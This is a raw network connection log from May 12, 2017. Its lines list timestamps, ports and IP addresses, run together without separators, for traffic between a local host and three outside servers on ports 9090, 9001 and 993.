May 12, 2017 18:54:55.147186041 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147233009 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147247076 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147259951 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147291899 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147315979 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.147331953 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147372961 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147481918 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147497892 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147744894 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147763968 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147845030 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.147877932 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147880077 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.147891045 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147900105 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.147910118 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147954941 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.148936987 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.151556015 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.151576996 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.151586056 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.151674032 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.152616978 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.152640104 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.152759075 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.153572083 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.153590918 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.153603077 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.153666019 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.154634953 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.154652119 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.154659986 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.154731989 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.154745102 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.154759884 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.154774904 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.156229019 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.156248093 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.156352997 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.156368971 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.157115936 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.157140970 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.157207012 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.157222033 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.159462929 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.159487963 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.159569025 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.159581900 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.160775900 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.160799026 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.160861969 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.160873890 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.160907984 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.164525986 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.272449017 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.272610903 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.340451956 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:55.340585947 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:55.372450113 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.580465078 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.580589056 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.993335009 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.996457100 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.997060061 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:56.017710924 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.017733097 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.017823935 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:56.017838955 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.027584076 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.027688026 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:56.027702093 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.037086010 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.037113905 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.037324905 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:56.037341118 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.053016901 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.053056002 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.053354025 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:56.053375006 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.055566072 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.055597067 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.056363106 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:56.056379080 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.071659088 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.071685076 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.071700096 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.071887970 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:56.071908951 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.083648920 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.083688974 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.083790064 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.083806038 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.083817005 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.083983898 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:56.084002972 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.087217093 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.087238073 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.087393045 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:56.087418079 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.093276024 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.093297005 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.093671083 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:56.093688011 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.096657991 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.096678972 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.096987009 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:56.097007036 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.104501963 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.104516029 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.104856968 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:56.332453966 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.560477972 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:56.560709000 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:57.016455889 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.016618013 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:57.105309010 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.105329990 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.105345011 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.105420113 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.134720087 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.134749889 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.135132074 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.135163069 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135173082 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135184050 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135189056 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135209084 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135222912 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135227919 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135237932 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135353088 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.135365963 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.135386944 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.135401011 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135410070 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135416031 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135422945 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135428905 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135436058 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135447979 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135454893 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135801077 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.135816097 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.135914087 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.135929108 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135938883 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135945082 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135951042 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135957003 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135963917 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135971069 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.135977983 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136058092 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.136069059 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.136138916 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.136149883 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.136233091 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:57.136306047 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.136317968 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136327028 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136332989 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136339903 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136347055 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136353970 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136360884 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136368036 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136769056 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.136785030 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.136876106 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.136890888 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136899948 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136905909 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136912107 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136918068 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136924028 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136929989 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.136935949 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.137016058 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.137027025 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.137095928 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.137106895 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.138449907 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.138463974 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.138571024 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.138586044 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.138595104 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.138601065 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.138889074 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.138907909 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.138983011 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.139059067 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.139070034 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.139843941 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:57.139858961 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.139868975 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.139874935 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.139880896 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.139888048 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.139894009 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.139899969 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.139905930 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.139911890 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.139919043 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140027046 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:57.140043020 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140053988 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140058994 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140068054 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140072107 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140077114 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140085936 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140090942 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140094042 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140099049 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140103102 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140106916 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140110970 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140115023 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140117884 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140121937 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140125990 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140130043 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140134096 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140136957 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140542984 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:57.140562057 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140573978 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140579939 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140583992 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140588045 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140590906 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140594959 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140599012 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140603065 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140605927 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140609980 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140615940 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140623093 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140630960 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140636921 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140642881 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140649080 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140655041 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140661955 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140669107 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140676022 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.140882969 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.140897036 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.140970945 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.140981913 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.141078949 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:57.141094923 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141103983 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141115904 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141122103 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141129017 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141136885 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141148090 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141155005 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141161919 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141170025 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141176939 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141182899 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141186953 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141191959 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141197920 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.141278028 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.141289949 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.141357899 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.141367912 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.141446114 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:57.141972065 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.142076969 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:57.142092943 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.142395020 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.142410040 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.142519951 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.142535925 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.142602921 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.142616987 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.142684937 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.142697096 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.142811060 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.142826080 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.143254995 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.143269062 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.143282890 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.143352032 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.143367052 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.143388987 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.143589020 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:57.143683910 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.143701077 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.143815994 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.143830061 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.143886089 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.143896103 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.144104004 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.144118071 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144128084 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144134998 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144140959 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144146919 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144150972 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144154072 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144160032 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144278049 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.144293070 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144300938 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144308090 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144315958 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144323111 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144330978 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144340038 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144397020 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144794941 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.144809961 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.144891977 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.144907951 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144917011 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144922972 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144928932 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144932985 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144937038 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144942999 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.144948959 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.145039082 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.145051003 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.145124912 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.145136118 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.146002054 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.146078110 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.146092892 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146104097 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146110058 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146116972 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146122932 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146128893 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146133900 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146140099 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146421909 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.146435022 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.146521091 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.146534920 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146543980 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146549940 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146555901 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146562099 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146568060 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146574974 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146580935 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146586895 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.146666050 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.146677971 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.146747112 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.146758080 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.148096085 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.148185015 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.148202896 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.148597002 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.148612022 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.148726940 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.148740053 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.148802042 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.148816109 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.149477005 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.149494886 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.149827957 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.149843931 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.150063992 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.150079012 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.161160946 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:57.161180973 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.161622047 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.161642075 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.161654949 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.161664009 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.161740065 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.360634089 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.361080885 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:57.372457027 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.492060900 CEST90014919879.137.85.71192.168.1.16
